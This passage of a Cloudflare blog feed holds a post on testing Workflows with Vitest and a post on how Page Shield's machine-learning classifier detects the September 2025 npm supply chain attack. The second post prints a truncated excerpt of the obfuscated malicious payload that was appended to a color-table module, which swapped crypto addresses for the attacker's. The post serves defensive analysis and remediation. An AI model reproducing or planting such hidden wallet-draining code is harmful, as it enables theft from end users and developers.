    <p>We're introducing a new set of APIs that enable comprehensive, granular, and isolated testing for your Workflows, all running locally and offline with <code>vitest-pool-workers</code>, our testing framework that supports running tests in the Workers runtime <code>workerd</code>. This enables fast, reliable, and cheap test runs that don't depend on a network connection.</p><p>They are available through the <code>cloudflare:test</code> module, with <code>@cloudflare/vitest-pool-workers</code> version <b>0.9.0</b> and above. The new test module provides two primary functions to introspect your Workflows:</p><ul><li><p><code>introspectWorkflowInstance</code>: useful for unit tests with known instance IDs</p></li><li><p><code>introspectWorkflow</code>: useful for integration tests where IDs are typically generated dynamically.</p></li></ul><p>Let's walk through a practical example.</p>
    <div>
      <h3>A practical example: testing a blog moderation workflow</h3>
      <a href="#a-practical-example-testing-a-blog-moderation-workflow">
        
      </a>
    </div>
    <p>Imagine a simple Workflow for moderating a blog. When a user submits a comment, the Workflow requests a review from workers-ai. Based on the violation score returned, it then waits for a moderator to approve or deny the comment. If approved, it calls a <code>step.do</code> to publish the comment via an external API.</p><p>Testing this without our new APIs would be impossible. You'd have no direct way to simulate the step’s outcomes and simulate the moderator's approval. Now, you can mock everything.</p><p>Here’s the test code using <code>introspectWorkflowInstance</code> with a known instance ID:</p>
            <pre><code>import { env, introspectWorkflowInstance } from "cloudflare:test";

it("should mock a an ambiguous score, approve comment and complete", async () =&gt; {
   // CONFIG
   await using instance = await introspectWorkflowInstance(
       env.MODERATOR,
       "my-workflow-instance-id-123"
   );
   await instance.modify(async (m) =&gt; {
       await m.mockStepResult({ name: "AI content scan" }, { violationScore: 50 });
       await m.mockEvent({ 
           type: "moderation-approval", 
           payload: { action: "approved" },
       });
       await m.mockStepResult({ name: "publish comment" }, { status: "published" });
   });

   await env.MODERATOR.create({ id: "my-workflow-instance-id-123" });
   
   // ASSERTIONS
   expect(await instance.waitForStepResult({ name: "AI content scan" })).toEqual(
       { violationScore: 50 }
   );
   expect(
       await instance.waitForStepResult({ name: "publish comment" })
   ).toEqual({ status: "published" });

   await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});</code></pre>
            <p>This test mocks the outcomes of steps that require external API calls, such as the 'AI content scan', which calls <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a>, and the 'publish comment' step, which calls an external blog API.</p><p>If the instance ID is not known, because you are either making a worker request that starts one/multiple Workflow instances with random generated ids, you can call <code>introspectWorkflow(env.MY_WORKFLOW)</code>. Here’s the test code for that scenario, where only one Workflow instance is created:</p>
            <pre><code>it("workflow mock a non-violation score and be successful", async () =&gt; {
   // CONFIG
   await using introspector = await introspectWorkflow(env.MODERATOR);
   await introspector.modifyAll(async (m) =&gt; {
       await m.disableSleeps();
       await m.mockStepResult({ name: "AI content scan" }, { violationScore: 0 });
   });

   await SELF.fetch(`https://mock-worker.local/moderate`);

   const instances = introspector.get();
   expect(instances.length).toBe(1);

   // ASSERTIONS
   const instance = instances[0];
   expect(await instance.waitForStepResult({ name: "AI content scan"  })).toEqual({ violationScore: 0 });
   await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});</code></pre>
            <p>Notice how in both examples we’re calling the introspectors with <code>await using</code> - this is the <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Resource_management#the_using_and_await_using_declarations"><u>Explicit Resource Management</u></a> syntax from modern JavaScript. It is crucial here because when the introspector objects go out of scope at the end of the test, its disposal method is automatically called. This is how we ensure each test works with its own isolated storage.</p><p>The <code>modify</code> and <code>modifyAll</code> functions are the gateway to controlling instances. Inside its callback, you get access to a modifier object with methods to inject behavior such as mocking step outcomes, events and disabling sleeps.</p><p>You can find detailed documentation on the <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/test-apis/#workflows"><u>Workers Cloudflare Docs</u></a>.</p><p><b>How we connected Vitest to the Workflows Engine</b></p><p>To understand the solution, you first need to understand the local architecture. When you run <code>wrangler dev,</code> your Workflows are powered by Miniflare, a simulator for testing Cloudflare Workers, and <code>workerd</code>. Each running workflow instance is backed by its own SQLite Durable Object, which we call the "Engine DO". This Engine DO is responsible for executing steps, persisting state, and managing the instance's lifecycle. It lives inside the local isolated Workers runtime.</p><p>Meanwhile, the Vitest test runner is a separate Node.js process living outside of <code>workerd</code>. This is why we have a Vitest custom pool that allows tests to run inside <code>workerd</code> called vitest-pool-workers. Vitest-pool-workers has a Runner Worker, which is a worker to run the tests with bindings to everything specified in the user wrangler.json file. This worker has access to the APIs under the “cloudflare:test” module. It communicates with Node.js through a special DO called Runner Object via WebSocket/RPC.</p><p>The first approach we considered was to use the test runner worker. In its current state, Runner worker has access to Workflow bindings from Workflows defined on the wrangler file. We considered also binding each Workflow's Engine DO namespace to this runner worker. This would give vitest-pool-workers direct access to the Engine DOs where it would be possible to directly call Engine methods. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ptKRqwpfvK1dxY6T5Kuin/fbf92915b2d2a95542bf6bec8addd5ad/image1.png" />
          </figure><p>While promising, this approach would have required undesirable changes to the core of Miniflare and vitest-pool-workers, making it too invasive for this single feature. </p><p>Firstly, we would have needed to add a new <i>unsafe</i> field to Miniflare's Durable Objects. Its sole purpose would be to specify the service name of our Engines, preventing Miniflare from applying its default user prefix which would otherwise prevent the Durable Objects from being found.</p><p>Secondly, vitest-pool-workers would have been forced to bind every Engine DO from the Workflows in the project to its runner, even those not being tested. This would introduce unwanted bindings into the test environment, requiring an additional cleanup to ensure they were not exposed to the user's tests env.</p><p><b>The breakthrough</b></p><p>The solution is a combination of privileged local-only APIs and Remote Procedure Calls (RPC).</p><p>First, we added a set of <code>unsafe</code> functions to the <i>local</i> implementation of the Workflows binding, functions that are not available in the production environment. They act as a controlled access point, accessible from the test environment, allowing the test runner to get a stub to a specific Engine DO by providing its instance ID.</p><p>Once the test runner has this stub, it uses RPC to call specific, trusted methods on the Engine DO via a special <code>RpcTarget</code> called <code>WorkflowInstanceModifier</code>. Any class that extends <code>RpcTarget</code> has its objects replaced by a stub. Calling a method on this stub, in turn, makes an RPC back to the original object.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3AObAsJuBplii3aeqMw2bn/74b21880b09a293fef6f84de1ae1318e/image2.png" />
          </figure><p>This simpler approach is far less invasive because it's confined to the Workflows environment, which also ensures any future feature changes are safely isolated.</p><p><b>Introspecting Workflows with unknown IDs</b></p><p>When creating Workflows instances (either by <code>create()</code> or <code>createBatch()</code>) developers can provide a specific ID or have it automatically generated for them. This ID identifies the Workflow instance and is then used to create the associated Engine DO ID.</p><p>The logical starting point for implementation was <code>introspectWorkflowInstance(binding, instanceID)</code>, as the instance ID is known in advance. This allows us to generate the Engine DO ID required to identify the engine associated with that Workflow instance.</p><p>But often, one part of your application (like an HTTP endpoint) will create a Workflow instance with a randomly generated ID. How can we introspect an instance when we don't know its ID until after it's created?</p><p>The answer was to use a powerful feature of JavaScript: <code>Proxy</code> objects.</p><p>When you use <code>introspectWorkflow(binding)</code>, we wrap the Workflow binding in a Proxy. This proxy non-destructively intercepts all calls to the binding, specifically looking for <code>.create()</code> and <code>.createBatch()</code>. When your test triggers a workflow creation, the proxy inspects the call. It captures the instance ID — either one you provided or the random one generated — and immediately sets up the introspection on that ID, applying all the modifications you defined in the <code>modifyAll</code> call. The original creation call then proceeds as normal.</p>
            <pre><code>env[workflow] = new Proxy(env[workflow], {
  get(target, prop) {
    if (prop === "create") {
      return new Proxy(target.create, {
        async apply(_fn, _this, [opts = {}]) {

          // 1. Ensure an ID exists 
          const optsWithId = "id" in opts ? opts : { id: crypto.randomUUID(), ...opts };

          // 2. Apply test modifications before creation
          await introspectAndModifyInstance(optsWithId.id);

          // 3. Call the original 'create' method 
          return target.create(optsWithId);
        },
      });
    }

    // Same logic for createBatch()
  }
}</code></pre>
            <p>When the <code>await using</code> block from <code>introspectWorkflow()</code> finishes, or the <code>dispose()</code> method is called at the end of the test, the introspector is disposed of, and the proxy is removed, leaving the binding in its original state. It’s a low-impact approach that prioritizes developer experience and long-term maintainability.</p>
    <div>
      <h3>Get started with testing Workflows</h3>
      <a href="#get-started-with-testing-workflows">
        
      </a>
    </div>
    <p>Ready to add tests to your Workflows? Here’s how to get started:</p><ol><li><p><b>Update your dependencies:</b> Make sure you are using <code>@cloudflare/vitest-pool-workers</code> version <b>0.9.0 </b>or newer. Run the following command in your project: <code>npm install @cloudflare/vitest-pool-workers@latest</code></p></li><li><p><b>Configure your test environment:</b> If you're new to testing on Workers, follow our <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/write-your-first-test/"><u>guide to write your first test</u></a>.</p></li></ol><p><b>Start writing tests</b>: Import <code>introspectWorkflowInstance</code> or <code>introspectWorkflow</code> from <code>cloudflare:test</code> in your test files and use the patterns shown in this post to mock, control, and assert on your Workflow's behavior. Also check out the official <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/test-apis/#workflows"><u>API reference</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Internship Experience]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Workflows]]></category>
            <guid isPermaLink="false">5Kq3w0WQ8bFIvLmxsDpIjO</guid>
            <dc:creator>Olga Silva</dc:creator>
            <dc:creator>Mia Malden</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare’s client-side security made the npm supply chain attack a non-event]]></title>
            <link>https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/</link>
            <pubDate>Fri, 24 Oct 2025 17:10:43 GMT</pubDate>
            <description><![CDATA[ A recent npm supply chain attack compromised 18 popular packages. This post explains how Cloudflare’s graph-based machine learning model, which analyzes 3.5 billion scripts daily, was built to detect and block exactly this kind of threat automatically. ]]></description>
            <content:encoded><![CDATA[ <p>In early September 2025, attackers used a phishing email to compromise one or more trusted maintainer accounts on npm. They used this to publish malicious releases of 18 widely used npm packages (for example chalk, debug, ansi-styles) that account for more than <a href="https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised"><u>2 billion downloads per week</u></a>. Websites and applications that used these compromised packages were vulnerable to hackers stealing crypto assets (“crypto stealing” or “wallet draining”) from end users. In addition, compromised packages could also modify other packages owned by the same maintainers (using stolen npm tokens) and included code to <a href="https://unit42.paloaltonetworks.com/npm-supply-chain-attack/"><u>steal developer tokens for CI/CD pipelines and cloud accounts</u></a>.</p><p>As it relates to end users of your applications, the good news is that Cloudflare<a href="https://www.cloudflare.com/application-services/products/page-shield/"><u> Page Shield, our client-side security offering</u></a> will detect compromised JavaScript libraries and prevent crypto-stealing. More importantly, given the AI powering Cloudflare’s detection solutions, customers are protected from similar attacks in the future, as we explain below.</p>
            <pre><code>export default {
 aliceblue: [240, 248, 255],
 …
 yellow: [255, 255, 0],
 yellowgreen: [154, 205, 50]
}


const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66 …
</code></pre>
            <p><sub><i>Excerpt from the injected malicious payload, along with the rest of the innocuous normal code.</i></sub><sub> </sub><sub><i>Among other things, the payload replaces legitimate crypto addresses with attacker’s addresses (for multiple currencies, including bitcoin, ethereum, solana).</i></sub></p>
    <div>
      <h2>Finding needles in a 3.5 billion script haystack</h2>
      <a href="#finding-needles-in-a-3-5-billion-script-haystack">
        
      </a>
    </div>
    <p>Everyday, Cloudflare Page Shield assesses 3.5 billion scripts per day or 40,000 scripts per second. Of these, less than 0.3% are malicious, based on our machine learning (ML)-based malicious script detection. As explained in a prior <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/#ai-inference-at-scale"><u>blog post</u></a>, we preprocess JavaScript code into an <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree"><u>Abstract Syntax Tree</u></a> to train a <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> that classifies a given JavaScript file as either malicious or benign. </p><p>The intuition behind using a graph-based model is to use both the structure (e.g. function calling, assertions) and code text to learn hacker patterns. For example, in the npm compromise, the <a href="https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised"><u>malicious code</u></a> injected in compromised packages uses code obfuscation and also modifies code entry points for crypto wallet interfaces, such as Ethereum’s window.ethereum, to swap payment destinations to accounts in the attacker’s control. Crucially, rather than engineering such behaviors as features, the model learns to distinguish between good and bad code purely from structure and syntax. As a result, it is resilient to techniques used not just in the npm compromise but also future compromise techniques. </p><p>Our ML model outputs the probability that a script is malicious which is then transformed into a score ranging from 1 to 99, with low scores indicating likely malicious and high scores indicating benign scripts. Importantly, like many Cloudflare ML models, inferencing happens in under 0.3 seconds. </p>
    <div>
      <h2>Model Evaluation</h2>
      <a href="#model-evaluation">
        
      </a>
    </div>
    <p>Since the initial launch, our JavaScript classifiers are constantly being evolved to optimize model evaluation metrics, in this case, <a href="https://en.wikipedia.org/wiki/Precision_and_recall"><u>F1 measure</u></a>. Our current metrics are </p><table><tr><th><p><b>Metric</b></p></th><th><p><b>Latest: Version 2.7</b></p></th><th><p><b>Improvement over prior version</b></p></th></tr><tr><td><p>Precision</p></td><td><p>98%</p></td><td><p>5%</p></td></tr><tr><td><p>Recall</p></td><td><p>90%</p></td><td><p>233%</p></td></tr><tr><td><p>F1</p></td><td><p>94%</p></td><td><p>123%</p></td></tr></table><p>Some of the improvements were accomplished through:</p><ul><li><p>More training examples, curated from a combination of open source datasets, security partners, and labeling of Cloudflare traffic</p></li><li><p>Better training examples, for instance, by removing samples with pure comments in them or scripts with nearly equal structure</p></li><li><p>Better training set stratification, so that training, validation and test sets all have similar distribution of classes of interest</p></li><li><p>Tweaking the evaluation criteria to maximize recall with 99% precision</p></li></ul><p>Given the confusion matrix, we should expect about 2 false positives per second, if we assume ~0.3% of the 40,000 scripts per second are flagged as malicious. We employ multiple LLMs alongside expert human security analysts to review such scripts around the clock. Most False Positives we encounter in this way are rather challenging. For example, scripts that read all form inputs except credit card numbers (e.g. reject input values that test true using the <a href="https://en.wikipedia.org/wiki/Luhn_algorithm"><u>Luhn algorithm</u></a>), injecting dynamic scripts, heavy user tracking, heavy deobfuscation, etc. User tracking scripts often exhibit a combination of these behaviors, and the only reliable way to distinguish truly malicious payloads is by assessing the trustworthiness of their connected domains. We feed all newly labeled scripts back into our ML training (&amp; testing) pipeline.</p><p>Most importantly, we verified that Cloudflare Page Shield would have successfully detected all 18 compromised npm packages as malicious (a novel attack, thus, not in the training data)..</p>
    <div>
      <h2>Planned improvements</h2>
      <a href="#planned-improvements">
        
      </a>
    </div>
    <p>Static script analysis has proven effective and is sometimes the only viable approach (e.g., for npm packages). To address more challenging cases, we are enhancing our ML signals with contextual data including script URLs, page hosts, and connected domains. Modern Agentic AI approaches can wrap JavaScript runtimes as tools in an overall AI workflow. Then, they can enable a hybrid approach that combines static and dynamic analysis techniques to tackle challenging false positive scenarios, such as user tracking scripts.</p>
    <div>
      <h3>Consolidating classifiers</h3>
      <a href="#consolidating-classifiers">
        
      </a>
    </div>
    <p><a href="https://blog.cloudflare.com/detecting-magecart-style-attacks-for-pageshield/"><u>Over 3 years ago</u></a> we launched our classifier, “<a href="https://developers.cloudflare.com/page-shield/detection/review-malicious-scripts/#review-malicious-scripts"><u>Code Behaviour Analysis</u></a>” for Magecart-style scripts that learns  code obfuscation and data exfiltration behaviors. Subsequently, we also deployed our <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> based approach that can also classify <a href="https://blog.cloudflare.com/navigating-the-maze-of-magecart/"><u>Magecart attacks</u></a>. Given the efficacy of the MPGCN-based malicious code analysis, we are announcing the end-of-life of <a href="https://developers.cloudflare.com/page-shield/detection/review-malicious-scripts/#review-malicious-scripts"><u>code behaviour analysis</u></a> by the end of 2025. </p>
    <div>
      <h2>Staying safe always</h2>
      <a href="#staying-safe-always">
        
      </a>
    </div>
    <p>In the npm attack, we did not see any activity in the Cloudflare network related to this compromise among Page Shield users, though for other exploits, we catch its traffic within minutes. In this case, patches of the compromised npm packages were released in 2 hours or less, and given that the infected payloads had to be built into end user facing applications for end user impact, we suspect that our customers dodged the proverbial bullet. That said, had traffic gotten through, Page Shield was already equipped to detect and block this threat.</p><p>Also make sure to consult our <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>Page Shield Script detection</u></a> to find malicious packages. Consult the Connections tab within Page Shield to view suspicious connections made by your applications.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6rMXJZVWEu6LkupOPY2pOB/0740a085fa2a64de3cff148fc29ad328/BLOG-3052_2.png" />
          </figure><p><sub><i>Several scripts are marked as malicious. </i></sub></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1oj2WALUAurKuu2XYTdKPm/fe8a564f10888e656c2510bc2a91dd6f/BLOG-3052_3.png" />
          </figure><p><sub><i>Several connections are marked as malicious. </i></sub></p><p>
And be sure to complete the following steps:</p><ol><li><p><b>Audit your dependency tree</b> for recently published versions (check package-lock.json / npm ls) and look for versions published around early–mid September 2025 of widely used packages. </p></li><li><p><b>Rotate any credentials</b> that may have been exposed to your build environment.</p></li><li><p><b>Revoke and reissue CI/CD tokens and service keys</b> that might have been used in build <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">pipelines</a> (GitHub Actions, npm tokens, cloud credentials).</p></li><li><p><b>Pin dependencies</b> to known-good versions (or use lockfiles), and consider using a package allowlist / verified publisher features from your registry provider.</p></li><li><p><b>Scan build logs and repos for suspicious commits/GitHub Actions changes</b> and remove any unknown webhooks or workflows.</p></li></ol><p>While vigilance is key, automated defenses provide a crucial layer of protection against fast-moving supply chain attacks. Interested in better understanding your client-side supply chain? Sign up for our free, custom <a href="https://www.cloudflare.com/lp/client-side-risk-assessment/"><u>Client-Side Risk Assessment</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Supply Chain Attacks]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Malicious JavaScript]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">1DRrVAPmyZYyz2avWuwYZ4</guid>
            <dc:creator>Bashyam Anant</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Denzil Correa</dc:creator>
            <dc:creator>Israel Adura</dc:creator>
            <dc:creator>Georgie Yoxall</dc:creator>
        </item>
    </channel>
</rss>